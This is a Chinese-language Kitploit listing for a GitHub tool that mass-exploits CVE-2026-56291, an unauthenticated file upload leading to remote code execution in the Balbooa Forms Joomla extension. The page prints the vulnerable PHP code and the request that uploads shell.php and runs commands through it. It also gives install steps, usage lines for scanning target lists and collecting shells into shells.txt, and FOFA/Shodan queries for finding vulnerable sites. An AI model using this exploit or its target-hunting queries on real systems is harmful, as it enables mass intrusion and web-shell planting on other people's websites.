Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-56291 — Balbooa Forms (com_baforms) < 2.4.1 — 通过 form.uploadAttachmentFile 实现未认证文件上传至远程代码执行 | CVSS 9.8 | CISA KEV | Kitploit
工具/GitHubGitHub/shinthink/cve-2026-56291
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubshinthink/cve-2026-56291

CVE-2026-56291

Balbooa Forms (com_baforms) < 2.4.1 — 通过 form.uploadAttachmentFile 实现未认证文件上传至远程代码执行 | CVSS 9.8 | CISA KEV

查看仓库
222个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-56291 — Balbooa Forms Joomla 大规模 RCE 利用

无需认证的 form.uploadAttachmentFile → 无 CSRF → PHP 上传


概述

CVE-2026-56291 是 Balbooa Forms (com_baforms) Joomla 扩展 (< 2.4.1) 中的一个严重(CVSS 9.8)未认证任意文件上传漏洞。

前端任务 form.uploadAttachmentFile 没有调用 Session::checkToken() 或执行任何权限检查。上传的文件直接使用攻击者的扩展名:$fileName = $name . '.' . $ext。文件保存到 images/baforms/uploads/form-{id}/ 目录中 —— 可直接作为 PHP 执行。

受影响版本

版本状态
1.0 – 2.4.0存在漏洞
2.4.1+已修复

CISA KEV: 添加于 2026 年 7 月 10 日 —— 已确认被积极利用。


漏洞机制

根因

root@kitploit:~
// FormModel::uploadAttachmentFile (frontend/models/forms/FormModel.php ~L122)
// No Session::checkToken(), no permission check, no extension whitelist
$fileName = $name . '.' . $ext;  // attacker's extension used directly
$filePath = JPATH_ROOT . '/images/baforms/uploads/form-' . $formId . '/' . $fileName;
move_uploaded_file($tmpFile, $filePath);

攻击流程

root@kitploit:~
POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1&format=json
  file = shell.php (multipart)
→ Saved to images/baforms/uploads/form-1/shell.php
→ https://target.com/images/baforms/uploads/form-1/shell.php?c=id
→ RCE

安装

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-56291.git
cd CVE-2026-56291
pip install -r requirements.txt

使用

root@kitploit:~
python cve_2026_56291.py -t target.com
python cve_2026_56291.py -f targets.txt -o shells.txt
python cve_2026_56291.py -t target.com --debug
python cve_2026_56291.py -t target.com --no-cleanup

FOFA / Shodan

root@kitploit:~
FOFA:   body="com_baforms"
Shodan: http.html:"baforms"

参考

资源链接
CISA KEVcisa.gov/known-exploited-vulnerabilities
修复详情mysites.guru
研究人员Phil Taylor

与 Balbooa 无关。

下载工具